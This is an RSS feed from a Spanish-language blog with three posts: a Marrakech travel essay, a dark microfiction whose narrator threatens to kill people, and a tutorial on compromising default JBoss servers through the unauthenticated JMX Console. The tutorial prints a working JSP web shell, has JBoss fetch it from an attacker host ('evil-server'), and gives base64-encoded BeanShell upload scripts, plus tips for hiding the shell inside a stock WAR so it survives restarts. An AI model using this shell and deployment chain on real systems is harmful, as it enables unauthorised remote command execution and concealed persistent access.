<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" version="2.0">

<channel>
	<title>SYNsthesia</title>
	
	<link>http://www.synesthesic.net</link>
	<description>Another way of seeing Life</description>
	<lastBuildDate>Mon, 16 Aug 2010 09:55:36 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.1</generator>
		<atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/rss+xml" href="http://feeds.feedburner.com/synsthesia" /><feedburner:info uri="synsthesia" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><item>
		<title>Marrakech, la perla del sur</title>
		<link>http://feedproxy.google.com/~r/synsthesia/~3/k4CsfWfs41Y/</link>
		<comments>http://www.synesthesic.net/?p=1371#comments</comments>
		<pubDate>Mon, 16 Aug 2010 09:54:07 +0000</pubDate>
		<dc:creator>Willy Devil</dc:creator>
				<category><![CDATA[Africa]]></category>
		<category><![CDATA[Viajes]]></category>
		<category><![CDATA[africa]]></category>
		<category><![CDATA[marrakech]]></category>
		<category><![CDATA[marruecos]]></category>
		<category><![CDATA[viaje]]></category>

		<guid isPermaLink="false">http://www.synesthesic.net/?p=1371</guid>
		<description><![CDATA[Marrakech, ciudad de contrastes, la perla del sur, ciudad de Dios. Recientemente, he tenido la oportunidad de vivir, sufrir e impactarme al mismo tiempo, del ritmo de esta ciudad, de sus gentes. ¿Que palabra usaría para este que ha sido mi ultimo viaje? Impactante, sin ninguna duda. No dejo de pensar las sensaciones vividas. Pocas [...]]]></description>
			<content:encoded><![CDATA[<div id="_mcePaste">Marrakech, ciudad de contrastes, la perla del sur, ciudad de Dios. Recientemente, he tenido la oportunidad de vivir, sufrir e impactarme al mismo tiempo, del ritmo de esta ciudad, de sus gentes. ¿Que palabra usaría para este que ha sido mi ultimo viaje? Impactante, sin ninguna duda.</div>
<div></div>
<div id="_mcePaste">No dejo de pensar las sensaciones vividas. Pocas ciudades logran hacerte sentir miedo, respeto, curiosidad y rechazo en un mismo minuto, en una misma calle, en una misma esquina o puesto.</div>
<div></div>
<div>Si hablamos de Marrakech, hablamos de la Medina, del centro antiguo de su ciudad, rodeado de murallas que se mimetizan con el color de su tierra, edificios de siglos de antiguedad no rehabilitados, en donde vive su gente, callejones oscuros, en los que la sensación de ser asaltado de un momento a otro, es continua.</div>
<div></div>
<div>Los olores te invaden las fosas nasales, especias, miel, olor a heces, debido a las fabricas artesanales dedicadas a curtir piel de todos los tipos (vaca, cabra, cordero). Cada esquina, un mundo, cada esquina, un contraste.</div>
<div></div>
<div>Sus gentes, algunos siempre acompañan todo de una sonrisa, otros, parecen tristes, enfadados u oprimidos, es extraño, y al mismo tiempo, te preguntas si verdaderamente es feliz la gente de esta ciudad.</div>
<div></div>
<div>Tuve la suerte de poder ir coincidiendo con el mes de Ramadan, el mes del ayuno que todo musulman sano y adulto debe de practicar. Gracias a este hecho, me cruce con oceanos de gente camino a la Mezquita Kutubia, desde donde los muecines, llaman a la oración cinco veces al día, como si de gritos de guerra se trataran. Estos hacen que la piel se ponga de gallina, es impresionante, sobre todo, al anochecer.</div>
<div></div>
<div>El trafico, invade las calles, sin ningun orden, los semaforos existen, pero son respetados en el menor de los casos, con lo que cruzar, se hace una aventura, zigzageando entre motocicletas de hace 20 años y coches y autobuses destartalados. El sonido de los cascos de los caballos golpeando contra el suelo, hace retroceder tu mente 200 años a atras, y olvidar que me encontraba en pleno siglo XXI.</div>
<div></div>
<div>Marrakech, una ciudad no apta para miedosos, para intolerantes (aunque se hable de intolerancia a la mujer por parte del islam) y para poco aventureros.</div>
<div></div>
<div>Pero dos días, no dan para mucho. ¿Volver? Quiza algún día. Marrakech siempre esperara ahi, con sus murallas y su incesante ajetreo.</div>
]]></content:encoded>
			<wfw:commentRss>http://www.synesthesic.net/?feed=rss2&amp;p=1371</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://www.synesthesic.net/?p=1371</feedburner:origLink></item>
		<item>
		<title>Control mental</title>
		<link>http://feedproxy.google.com/~r/synsthesia/~3/dyXHzdsIrHA/</link>
		<comments>http://www.synesthesic.net/?p=1367#comments</comments>
		<pubDate>Thu, 29 Jul 2010 11:22:10 +0000</pubDate>
		<dc:creator>Willy Devil</dc:creator>
				<category><![CDATA[Relatos]]></category>
		<category><![CDATA[control]]></category>
		<category><![CDATA[locura]]></category>
		<category><![CDATA[mente]]></category>
		<category><![CDATA[micro]]></category>
		<category><![CDATA[relato]]></category>

		<guid isPermaLink="false">http://www.synesthesic.net/?p=1367</guid>
		<description><![CDATA[Detente. ¡Detente!. ¡¡Detente!! El tiempo se detiene por fin, y yo, hago lo mismo para observar. Observo la ansiedad que me invade, observo la presión a la que soy sometido día tras día por la sociedad, observo el rostro de la gente al contárselo con una mirada de perdón y comprensión, como si de Mesías [...]]]></description>
			<content:encoded><![CDATA[<p>Detente. ¡Detente!. ¡¡Detente!! El tiempo se detiene por fin, y yo, hago lo mismo para observar. Observo la ansiedad que me invade, observo la presión a la que soy sometido día tras día por la sociedad, observo el rostro de la gente al contárselo con una mirada de perdón y comprensión, como si de Mesías salvadores se trataran.</p>
<p>Harto, hastiado, ardiendo. Mi cabeza, mis neuronas, forman nuevas conexiones, a veces creo, que en algún momento, por error, se realizara una conexión incorrecta, y mi mente se nublara, se nublara hasta la locura, transformando esta ansiedad, en rabia asesina, en ganas de aniquilar, de matar, como un berserker drogado con amanita muscaria, dispuesto a echarse sobre sus demonios, sobre sus enemigos. ¿Quien maneja mi mente? ¿Un ente superior? ¿El alma? ¿Quien esta ahí para hacerlo? Continua&#8230; ¡Continua! ¡¡Continua!! Y la ansiedad, vuelve a mi garganta en forma de vomito ensangrentado, y cientos de caras, me vuelven a mirar con halos de bondad, asco y pena. Algún día, acabare con vuestras vidas&#8230; algún día.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.synesthesic.net/?feed=rss2&amp;p=1367</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://www.synesthesic.net/?p=1367</feedburner:origLink></item>
		<item>
		<title>Hacking JBoss, un nuevo enfoque</title>
		<link>http://feedproxy.google.com/~r/synsthesia/~3/VoV7vhCpJkM/</link>
		<comments>http://www.synesthesic.net/?p=1332#comments</comments>
		<pubDate>Tue, 13 Jul 2010 10:01:16 +0000</pubDate>
		<dc:creator>Willy Devil</dc:creator>
				<category><![CDATA[Seguridad informática]]></category>
		<category><![CDATA[documento]]></category>
		<category><![CDATA[enfoque]]></category>
		<category><![CDATA[genl0g]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[jboss]]></category>
		<category><![CDATA[paper]]></category>
		<category><![CDATA[seguridad]]></category>

		<guid isPermaLink="false">http://www.synesthesic.net/?p=1332</guid>
		<description><![CDATA[1.     Introducción Este documento trata sobre la explotación de las posibles vulnerabilidades que pueden aparecer tras realizar una instalación por defecto de Jboss. Los métodos de ataque, siempre serán usando JMX-Console. Podéis descargar el mismo en formato PDF desde aquí. 2.     ¿Qué es Jboss? JBoss es un servidor de aplicaciones J2EE de código abierto implementado [...]]]></description>
			<content:encoded><![CDATA[<h2>1.     Introducción</h2>
<p>Este documento trata sobre la explotación de las posibles vulnerabilidades que pueden aparecer tras realizar una instalación por defecto de Jboss. Los métodos de ataque, siempre serán usando JMX-Console. Podéis descargar el mismo en formato PDF desde <a href="/docs/Hacking_Jboss.pdf">aquí</a>.</p>
<h2>2.     ¿Qué es Jboss?</h2>
<p>JBoss es un servidor de aplicaciones J2EE de código abierto implementado en Java puro. Al estar basado en Java,  JBoss puede ser utilizado en cualquier sistema operativo que lo soporte.</p>
<h2>3.     Instalación por defecto</h2>
<p>La instalación por defecto de JBoss, escucha en el puerto 8080, y probé de un panel de administración Web muy útil para un atacante, con muchísimas posibilidad para comprometerlo.</p>
<p style="text-align: center;"><img class="aligncenter" title="Jboss 1" src="/imagenes/jboss/1.png" alt="" width="497" height="384" /></p>
<h2>4.     JMX Console</h2>
<p>La consola JMX es la consola de administración de JBoss que proporciona una vista real de los MBeans JMX que componen el servidor. Pueden proporcionar bastante información sobre el servidor en ejecución y le permite modificar su configuración, iniciar y parar componentes, etc. Por defecto se accede a la consola sin autenticación.</p>
<h2>5.     DeploymentScanner</h2>
<p>Para hacer un deploy (cargar) una aplicación personalizada al servidor Jboss comprometido, se utiliza el DeploymentScanner añadiendo una URL o un Path (ruta) con la aplicación WAR a cargar.</p>
<p>DeploymentScanner, chequea regularmente las URL’s introducidas. Por defecto, chequea la URL file:/[JBOSSHOME]/server/default/deploy/, pero con el comando addURL(), es posible una nueva URL para la carga (p.ej: www.evil-server.com/aplicacion.war). Jboss intentara descargar la aplicación desde la URL indicada. Una vez descargada, Jboss cargara la aplicación en el aplicativo propio, normalmente pasado un minuto.</p>
<p>En algunos casos, este método no funciona debido a los posibles filtrados de I/O, como por ejemplo, un firewall.</p>
<h3>5.1 Realizando un Deploy</h3>
<p>Es necesario una estructura específica de la aplicación, creando un WAR con el directorio WEB-INF.</p>
<p>A continuación un ejemplo de una aplicación de consola remota totalmente funcional<a href="#_ftn1">[1]</a>:</p>

<div class="wp_syntax"><div class="code"><pre class="bash" style="font-family:monospace;">$ <span style="color: #7a0874; font-weight: bold;">echo</span> <span style="color: #ff0000;">'A continuación el JSP'</span>
$ <span style="color: #c20cb9; font-weight: bold;">cat</span> <span style="color: #000000; font-weight: bold;">&gt;</span> cmd.jsp
<span style="color: #000000; font-weight: bold;">&lt;</span> <span style="color: #000000; font-weight: bold;">%@</span> page <span style="color: #007800;">import</span>=<span style="color: #ff0000;">&quot;java.util.*,java.io.*&quot;</span><span style="color: #000000; font-weight: bold;">%&gt;</span>
<span style="color: #000000; font-weight: bold;">&lt;</span> <span style="color: #000000; font-weight: bold;">%</span>
<span style="color: #000000; font-weight: bold;">%&gt;</span>
<span style="color: #000000; font-weight: bold;">&lt;</span>html<span style="color: #000000; font-weight: bold;">&gt;&lt;</span>body<span style="color: #000000; font-weight: bold;">&gt;</span>
Commands with JSP
<span style="color: #000000; font-weight: bold;">&lt;</span>form <span style="color: #007800;">METHOD</span>=<span style="color: #ff0000;">&quot;GET&quot;</span> <span style="color: #007800;">NAME</span>=<span style="color: #ff0000;">&quot;myform&quot;</span> <span style="color: #007800;">ACTION</span>=<span style="color: #ff0000;">&quot;&quot;</span><span style="color: #000000; font-weight: bold;">&gt;</span>
<span style="color: #000000; font-weight: bold;">&lt;</span>input <span style="color: #007800;">TYPE</span>=<span style="color: #ff0000;">&quot;text&quot;</span> <span style="color: #007800;">NAME</span>=<span style="color: #ff0000;">&quot;cmd&quot;</span><span style="color: #000000; font-weight: bold;">/&gt;</span>
<span style="color: #000000; font-weight: bold;">&lt;</span>input <span style="color: #007800;">TYPE</span>=<span style="color: #ff0000;">&quot;submit&quot;</span> <span style="color: #007800;">VALUE</span>=<span style="color: #ff0000;">&quot;Send&quot;</span><span style="color: #000000; font-weight: bold;">/&gt;</span>
<span style="color: #000000; font-weight: bold;">&lt;/</span>form<span style="color: #000000; font-weight: bold;">&gt;</span>
<span style="color: #000000; font-weight: bold;">&lt;</span>pr3<span style="color: #000000; font-weight: bold;">&gt;</span> <span style="color: #000000; font-weight: bold;">&lt;</span> <span style="color: #660033;">---Sustituir</span> por pre---<span style="color: #000000; font-weight: bold;">&gt;</span>
<span style="color: #000000; font-weight: bold;">&lt;</span> <span style="color: #000000; font-weight: bold;">%</span>
<span style="color: #000000; font-weight: bold;">if</span> <span style="color: #7a0874; font-weight: bold;">&#40;</span>request.getParameter<span style="color: #7a0874; font-weight: bold;">&#40;</span><span style="color: #ff0000;">&quot;cmd&quot;</span><span style="color: #7a0874; font-weight: bold;">&#41;</span> <span style="color: #000000; font-weight: bold;">!</span>= null<span style="color: #7a0874; font-weight: bold;">&#41;</span> <span style="color: #7a0874; font-weight: bold;">&#123;</span>
        out.println<span style="color: #7a0874; font-weight: bold;">&#40;</span><span style="color: #ff0000;">&quot;Command: &quot;</span> + request.getParameter<span style="color: #7a0874; font-weight: bold;">&#40;</span><span style="color: #ff0000;">&quot;cmd&quot;</span><span style="color: #7a0874; font-weight: bold;">&#41;</span> + <span style="color: #ff0000;">&quot;&lt;BR&gt;&quot;</span><span style="color: #7a0874; font-weight: bold;">&#41;</span>;
        Process p = Runtime.getRuntime<span style="color: #7a0874; font-weight: bold;">&#40;</span><span style="color: #7a0874; font-weight: bold;">&#41;</span>.exec<span style="color: #7a0874; font-weight: bold;">&#40;</span>request.getParameter<span style="color: #7a0874; font-weight: bold;">&#40;</span><span style="color: #ff0000;">&quot;cmd&quot;</span><span style="color: #7a0874; font-weight: bold;">&#41;</span><span style="color: #7a0874; font-weight: bold;">&#41;</span>;
        OutputStream os = p.getOutputStream<span style="color: #7a0874; font-weight: bold;">&#40;</span><span style="color: #7a0874; font-weight: bold;">&#41;</span>;
        InputStream <span style="color: #000000; font-weight: bold;">in</span> = p.getInputStream<span style="color: #7a0874; font-weight: bold;">&#40;</span><span style="color: #7a0874; font-weight: bold;">&#41;</span>;
        DataInputStream dis = new DataInputStream<span style="color: #7a0874; font-weight: bold;">&#40;</span><span style="color: #000000; font-weight: bold;">in</span><span style="color: #7a0874; font-weight: bold;">&#41;</span>;
        String disr = dis.readLine<span style="color: #7a0874; font-weight: bold;">&#40;</span><span style="color: #7a0874; font-weight: bold;">&#41;</span>;
        <span style="color: #000000; font-weight: bold;">while</span> <span style="color: #7a0874; font-weight: bold;">&#40;</span> disr <span style="color: #000000; font-weight: bold;">!</span>= null <span style="color: #7a0874; font-weight: bold;">&#41;</span> <span style="color: #7a0874; font-weight: bold;">&#123;</span>
                out.println<span style="color: #7a0874; font-weight: bold;">&#40;</span>disr<span style="color: #7a0874; font-weight: bold;">&#41;</span>; 
                disr = dis.readLine<span style="color: #7a0874; font-weight: bold;">&#40;</span><span style="color: #7a0874; font-weight: bold;">&#41;</span>; 
                <span style="color: #7a0874; font-weight: bold;">&#125;</span>
        <span style="color: #7a0874; font-weight: bold;">&#125;</span>
<span style="color: #000000; font-weight: bold;">%&gt;</span>
<span style="color: #000000; font-weight: bold;">&lt;/</span>pr3<span style="color: #000000; font-weight: bold;">&gt;</span> <span style="color: #000000; font-weight: bold;">&lt;</span> <span style="color: #660033;">---Sustituir</span> por <span style="color: #000000; font-weight: bold;">/</span>pre---<span style="color: #000000; font-weight: bold;">&gt;</span>
<span style="color: #000000; font-weight: bold;">&lt;/</span>body<span style="color: #000000; font-weight: bold;">&gt;&lt;/</span>html<span style="color: #000000; font-weight: bold;">&gt;</span>
$ <span style="color: #7a0874; font-weight: bold;">echo</span> <span style="color: #ff0000;">'El fichero web.xml en el directorio WEB-INF con la configuración de la aplicación'</span>   
$ <span style="color: #c20cb9; font-weight: bold;">mkdir</span> WEB-INF
$ <span style="color: #c20cb9; font-weight: bold;">cat</span> <span style="color: #000000; font-weight: bold;">&gt;</span> WEB-INF<span style="color: #000000; font-weight: bold;">/</span>web.xml
<span style="color: #000000; font-weight: bold;">&lt;</span> ?xml <span style="color: #007800;">version</span>=<span style="color: #ff0000;">&quot;1.0&quot;</span> ?<span style="color: #000000; font-weight: bold;">&gt;</span>
<span style="color: #000000; font-weight: bold;">&lt;</span>web <span style="color: #660033;">-app</span> <span style="color: #007800;">xmlns</span>=<span style="color: #ff0000;">&quot;http://java.sun.com/xml/ns/j2ee&quot;</span>
         xmlns:<span style="color: #007800;">xsi</span>=<span style="color: #ff0000;">&quot;http://www.w3.org/2001/XMLSchema-instance&quot;</span>
         xsi:<span style="color: #007800;">schemaLocation</span>=<span style="color: #ff0000;">&quot;http://java.sun.com/xml/ns/j2ee
http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd&quot;</span>
         <span style="color: #007800;">version</span>=<span style="color: #ff0000;">&quot;2.4&quot;</span><span style="color: #000000; font-weight: bold;">&gt;</span>
    <span style="color: #000000; font-weight: bold;">&lt;</span>servlet<span style="color: #000000; font-weight: bold;">&gt;</span>
        <span style="color: #000000; font-weight: bold;">&lt;/</span>servlet<span style="color: #000000; font-weight: bold;">&gt;&lt;</span>servlet -name<span style="color: #000000; font-weight: bold;">&gt;</span>Command<span style="color: #000000; font-weight: bold;">&lt;/</span>servlet<span style="color: #000000; font-weight: bold;">&gt;</span>
        <span style="color: #000000; font-weight: bold;">&lt;</span>jsp -file<span style="color: #000000; font-weight: bold;">&gt;/</span>cmd.jsp<span style="color: #000000; font-weight: bold;">&lt;/</span>jsp<span style="color: #000000; font-weight: bold;">&gt;</span>
&nbsp;
<span style="color: #000000; font-weight: bold;">&lt;/</span>web<span style="color: #000000; font-weight: bold;">&gt;</span>
$ <span style="color: #7a0874; font-weight: bold;">echo</span> <span style="color: #ff0000;">'Ahora lo empaquetamos en WAR'</span>
$ jar cvf cmd.war WEB-INF cmd.jsp
$ <span style="color: #7a0874; font-weight: bold;">echo</span> <span style="color: #ff0000;">'Copialo en el webserver en donde quieres que Jboss lo descargue'</span>
$ <span style="color: #c20cb9; font-weight: bold;">cp</span> cmd.war <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>www<span style="color: #000000; font-weight: bold;">/</span>localhost<span style="color: #000000; font-weight: bold;">/</span>htdocs<span style="color: #000000; font-weight: bold;">/</span></pre></div></div>

<h3>5.2 Haciendo el deploy</h3>
<p>Accedemos  a la sección “jboss.deployment” y entramos en el apartado llamado “flavor=URL,type=DeploymentScanner”.</p>
<p style="text-align: center;"><img class="aligncenter" title="Jboss 2" src="/imagenes/jboss/2.png" alt="" width="572" height="94" /></p>
<p>Una vez dentro, buscamos la sección voidURL().</p>
<p style="text-align: center;"><img class="aligncenter" title="Jboss 3" src="/imagenes/jboss/3.png" alt="" width="520" height="187" /></p>
<p>En ParamValue introducimos la URL maliciosa (http://evil-server/cmd.war) en donde tenemos la aplicación WAR generada y realizaremos la invocación.</p>
<p>Jboss, hace re-comprobación de aplicaciones cada minuto, con lo que una vez pasado un minuto (aproximadamente), Jboss cargará la aplicación y accederemos a nuestra aplicación (en este caso http://hacked-server/cmd/cmd.jsp).</p>
<h2>6.     Posibles problemas</h2>
<h3>a)     Bloqueo de I/O por un Firewall</h3>
<p>Podemos encontrarnos con que existe un Firewall que no permite a Jboss la salida hacia internet, pero si la entrada, con lo que en este caso, no se puede subir un WAR del modo anterior, con lo que utilizando el método addURL(), no sería posible realizar un deploy. Para ello encontramos el llamado BSH Deployer.</p>
<p>BSH Deployer, nos permite, a través de un lenguaje propio de <em>scripting</em> (similar a JAVA), realizar la carga de un script para poder subir un fichero y ubicarlo en el directorio que deseemos. Para ello, buscaremos la sección BSHDeployer en el panel principal de la consola JMX.</p>
<p style="text-align: center;"><img class="aligncenter" title="Jboss 4" src="/imagenes/jboss/4.png" alt="" width="315" height="106" /></p>
<p>En el apartado java.net.URL.createScriptDeployment() encontraremos dos parámetros para introducir, en el primer parámetro se debe de introducir la cadena del script creado y en el segundo parámetro debemos introducir el nombre del directorio y del fichero que queremos crear una vez que el script haga la decodificación del WAR en base64.</p>
<p style="text-align: center;"><img class="aligncenter" title="Jboss 5" src="/imagenes/jboss/5.png" alt="" width="565" height="219" /></p>
<p>Una vez subido el fichero deseado, en nuestro caso, un WAR con una Shell en JSP, a través de DeploymentScanner, usaremos la opción addURL(), en este caso como <em>string</em></p>
<p style="text-align: center;"><em><img class="aligncenter" title="Jboss 6" src="/imagenes/jboss/6.png" alt="" width="490" height="158" /><br />
</em></p>
<p>Una vez hecho esto, tendremos acceso al servidor con la aplicación cargada en el mismo. Accederemos a la aplicación como se ha comentado en el apartado del DeploymentScanner.</p>
<p>A continuación, el WAR anteriormente generado, codificado en base64 y con el script preparado para realizar la subida del fichero:</p>

<div class="wp_syntax"><div class="code"><pre class="java" style="font-family:monospace;"><span style="color: #000000; font-weight: bold;">import</span> <span style="color: #006699;">java.io.FileOutputStream</span><span style="color: #339933;">;</span> <span style="color: #000000; font-weight: bold;">import</span> <span style="color: #006699;">sun.misc.BASE64Decoder</span><span style="color: #339933;">;</span> <span style="color: #003399;">String</span> val<span style="color: #339933;">=</span><span style="color: #0000ff;">&quot;UEsDBBQACAAIAOp+ljwAAAAAAAAAAAAAAAAJAAQATUVUQS1JTkYv/soAAAMAUEsHCAAAAAACAAAAAAAAAFBLAwQUAAgACADqfpY8AAAAAAAAAAAAAAAAFAAAAE1FVEEtSU5GL01BTklGRVNULk1G803My0xLLS7RDUstKs7Mz7NSMNQz4OVyLkpNLElN0XWqBAmY6RnEGxopaASX5in4ZiYX5RdXFpek5hYreOYl62nycvFyAQBQSwcI7sxS0EcAAABHAAAAUEsDBAoAAAAAAI1+ljwAAAAAAAAAAAAAAAAIAAAAV0VCLUlORi9QSwMEFAAIAAgAjX6WPAAAAAAAAAAAAAAAAA8AAABXRUItSU5GL3dlYi54bWyFj81ugzAQhO9+CuS7vYTmhAh5gfTS5NBb5JptMfIPYh3M49egiKqn3Fb7zezONOfF2WLGiUzwJ36QJS/OLWsSfgk1jkWmnk68j3GsAQY1K0kPL3VwkBF4gqFC5GzT1QuZXZtSkulNhukHqrI8wOf75ap7dEoYT1F5vbrI1LQtL0GruEV48Yq94PBMfq/uR7lQx9lerpJHnqsRTrPF+DcJrxy2H9jdULni2qO1DfxjrBloFN/GYguDW4QOnoJFmLCL2SNo9cisaWAXsv3GOj5TtYz9AlBLBwjc7uTl1AAAAHIBAABQSwMEFAAIAAgAPIaVPAAAAAAAAAAAAAAAABEAAAByZWR0ZWFtLXNoZWxsLmpzcH3QXUrEMBAH8PecYiwU0kVygd2KD/uyILjoCUI71pF8bTpxBfHuTtaKRVDykDD/3wxkdu0tJDshkE8xc9+82FdrCpMzm+vLm6LZNO2N2rWKnkBnPBWc2UzIR5utR8asm8GPTQdXPYTiXAfv6pEzhQmkDj3807NVxxwHnGdIAh9KYPJY4fLUncE3HLRgsfeFU2GZjdZDnKUjVbsua2GH8KMofKtVtaK9ZbuGI9V5Ac/wK9EUhC8fEpWFyWUkG+8oYB12fiaHoL/iZQ1Q9xALmySd7IKuodg/RnzIkTWrT1BLBwimyLlg3gAAAJIBAABQSwECFAAUAAgACADqfpY8AAAAAAIAAAAAAAAACQAEAAAAAAAAAAAAAAAAAAAATUVUQS1JTkYv/soAAFBLAQIUABQACAAIAOp+ljzuzFLQRwAAAEcAAAAUAAAAAAAAAAAAAAAAAD0AAABNRVRBLUlORi9NQU5JRkVTVC5NRlBLAQIKAAoAAAAAAI1+ljwAAAAAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAMYAAABXRUItSU5GL1BLAQIUABQACAAIAI1+ljzc7uTl1AAAAHIBAAAPAAAAAAAAAAAAAAAAAOwAAABXRUItSU5GL3dlYi54bWxQSwECFAAUAAgACAA8hpU8psi5YN4AAACSAQAAEQAAAAAAAAAAAAAAAAD9AQAAcmVkdGVhbS1zaGVsbC5qc3BQSwUGAAAAAAUABQAvAQAAGgMAAAAA&quot;</span><span style="color: #339933;">;</span> BASE64Decoder decoder<span style="color: #339933;">=</span><span style="color: #000000; font-weight: bold;">new</span> BASE64Decoder<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #000066; font-weight: bold;">byte</span><span style="color: #009900;">&#91;</span> <span style="color: #009900;">&#93;</span> byteval<span style="color: #339933;">=</span>decoder.<span style="color: #006633;">decodeBuffer</span><span style="color: #009900;">&#40;</span>val<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #003399;">FileOutputStream</span> fstream<span style="color: #339933;">=</span><span style="color: #000000; font-weight: bold;">new</span> <span style="color: #003399;">FileOutputStream</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">&quot;/tmp/cmd.war&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> fstream.<span style="color: #006633;">write</span><span style="color: #009900;">&#40;</span>byteval<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> fstream.<span style="color: #006633;">close</span><span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span></pre></div></div>

<h3>b)     Limitaciones en los redirectores Apache + Jboss</h3>
<p>En determinadas ocasiones, podemos encontrar la limitación de que se ha configurado el servidor para servir paginas HTML estáticas y a su vez aplicaciones JSP. Esto hará que cualquier petición fuera de la “acl” creada en JBOSS para la carga de aplicaciones JSP, se redirigirá a Apache y nos dará un error 404 (Not Found), ya que es Apache quien interpreta esa petición y no encuentra la aplicación que hemos cargado, aunque realmente, si lo está.</p>
<p>Para evadir o by-passear este método de, en cierto modo, protección, podemos cargar directamente un JSP, sin realizar un empaquetado en WAR, con el método utilizado en BSH Deployer. Cargaremos la shell JSP en el interior de un WAR que existe por defecto en la instalación de JBOSS (web-console.war) y podremos realizar la llamada a la shell directamente como http://hacked-server/jmx-console/cmd.jsp. Esto nos servirá para dos cosas:</p>
<p>1) Si existe un reinicio del servidor JBOSS, la aplicación WAR que hemos cargado no se cargara automáticamente, con lo que perderemos el acceso. Con este método, esto no ocurre, ya que el jsp se carga con los módulos por defecto de JBOSS, con lo que siempre, será cargado, a no ser, claro, que estos módulos, sean deshabilitados.</p>
<p>2) Es más discreto, ya que no aparece cargada en el listado de aplicaciones cargadas y esta oculta dentro de un WAR estándar.</p>
<p>Para realizar esto, codificaremos el JSP en base64, en vez de el fichero WAR y usaremos la misma mecánica anteriormente citada, con la diferencia, de que en el script BSH, al hacer la recodificación a fichero, usaremos directamente la ruta del directorio a atacar (en este caso /usr/jboss-4.2.0.GA/server/default/deploy/management/console-mgr.sar/web-console.war/cmd.jsp).</p>
<p style="text-align: center;"><img class="aligncenter" title="Jboss 7" src="/imagenes/jboss/7.png" alt="" width="497" height="186" /></p>
<p>A continuación el script utilizado para realizar la carga con el JSP codificado en base64:</p>

<div class="wp_syntax"><div class="code"><pre class="java" style="font-family:monospace;"><span style="color: #000000; font-weight: bold;">import</span> <span style="color: #006699;">java.io.FileOutputStream</span><span style="color: #339933;">;</span> <span style="color: #000000; font-weight: bold;">import</span> <span style="color: #006699;">sun.misc.BASE64Decoder</span><span style="color: #339933;">;</span> <span style="color: #003399;">String</span> val<span style="color: #339933;">=</span><span style="color: #0000ff;">&quot;PCVAIHBhZ2UgaW1wb3J0PSJqYXZhLnV0aWwuKixqYXZhLmlvLioiJT4KPCUKaWYgKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJjbWQiKSAhPSBudWxsKSB7ClN0cmluZyBjbWQgPSByZXF1ZXN0LmdldFBhcmFtZXRlcigiY21kIik7ClByb2Nlc3MgcCA9IFJ1bnRpbWUuZ2V0UnVudGltZSgpLmV4ZWMoY21kKTsKT3V0cHV0U3RyZWFtIG9zID0gcC5nZXRPdXRwdXRTdHJlYW0oKTsKSW5wdXRTdHJlYW0gaW4gPSBwLmdldElucHV0U3RyZWFtKCk7CkRhdGFJbnB1dFN0cmVhbSBkaXMgPSBuZXcgRGF0YUlucHV0U3RyZWFtKGluKTsKU3RyaW5nIGRpc3IgPSBkaXMucmVhZExpbmUoKTsKd2hpbGUgKCBkaXNyICE9IG51bGwgKSB7Cm91dC5wcmludGxuKGRpc3IpOwpkaXNyID0gZGlzLnJlYWRMaW5lKCk7Cn0KfQolPgoK&quot;</span><span style="color: #339933;">;</span> BASE64Decoder decoder<span style="color: #339933;">=</span><span style="color: #000000; font-weight: bold;">new</span> BASE64Decoder<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #000066; font-weight: bold;">byte</span><span style="color: #009900;">&#91;</span> <span style="color: #009900;">&#93;</span> byteval<span style="color: #339933;">=</span>decoder.<span style="color: #006633;">decodeBuffer</span><span style="color: #009900;">&#40;</span>val<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #003399;">FileOutputStream</span> fstream<span style="color: #339933;">=</span><span style="color: #000000; font-weight: bold;">new</span> <span style="color: #003399;">FileOutputStream</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">&quot;/usr/jboss-4.2.0.GA/server/default/deploy/management/console-mgr.sar/web-console.war/cmd.jsp&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> fstream.<span style="color: #006633;">write</span><span style="color: #009900;">&#40;</span>byteval<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> fstream.<span style="color: #006633;">close</span><span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span></pre></div></div>

<h2>7.     Notas finales</h2>
<p>Este documento, se trata de un borrador inicial, realizado como un &#8220;how-to&#8221; de distribución interna, pero he decidido publicarlo, es posible que debido a ello existan erratas en el documento.</p>
<p>Quiero agradecer a Jörg Scheinert el permiso que me ha dado para publicar la shell que el utilizo en su día para ilustrar su documento.</p>
<p>También agradezco desde aquí a mis antiguos compañeros (Paco, J.I y David), por haber dedicado horas a investigar junto a mi, gracias a las cuales, logramos encontrar una nueva forma de bypassear la seguridad de Jboss.</p>
<pre>
